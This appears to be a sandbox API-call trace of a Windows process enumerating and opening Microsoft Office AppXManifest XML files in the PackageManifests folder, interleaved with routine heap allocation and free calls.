1 [0098.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.951] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xbf2f172d, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0xbf2f172d, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xbf33deae, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", cAlternateFileName="APC553~1.XML")) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88e18 [0098.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0098.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88e18 | out: hHeap=0x20000) returned 1 [0098.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.952] AreFileApisANSI () returned 1 [0098.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.952] AreFileApisANSI () returned 1 [0098.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 105 [0098.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.953] GetFileType (hFile=0x418) returned 0x1 [0098.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.953] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.953] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.954] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.954] CloseHandle (hObject=0x418) returned 1 [0098.954] AreFileApisANSI () returned 1 [0098.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 105 [0098.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.954] GetFileType (hFile=0x418) returned 0x1 [0098.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.954] CloseHandle (hObject=0x418) returned 1 [0098.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.956] AreFileApisANSI () returned 1 [0098.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 105 [0098.956] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xbf2f172d, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0xbf2f172d, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xbf33deae, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.956] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xbf2f172d, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0xbf2f172d, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xbf2f172d, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x53d21, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP9FA1~1.XML")) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d0d0 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0098.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88e18 [0098.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88c48 [0098.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88e18 | out: hHeap=0x20000) returned 1 [0098.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88c48 | out: hHeap=0x20000) returned 1 [0098.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.957] AreFileApisANSI () returned 1 [0098.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.957] AreFileApisANSI () returned 1 [0098.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 105 [0098.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.958] GetFileType (hFile=0x418) returned 0x1 [0098.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.958] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.958] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.958] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.958] CloseHandle (hObject=0x418) returned 1 [0098.959] AreFileApisANSI () returned 1 [0098.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 105 [0098.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.959] GetFileType (hFile=0x418) returned 0x1 [0098.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.959] CloseHandle (hObject=0x418) returned 1 [0098.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, 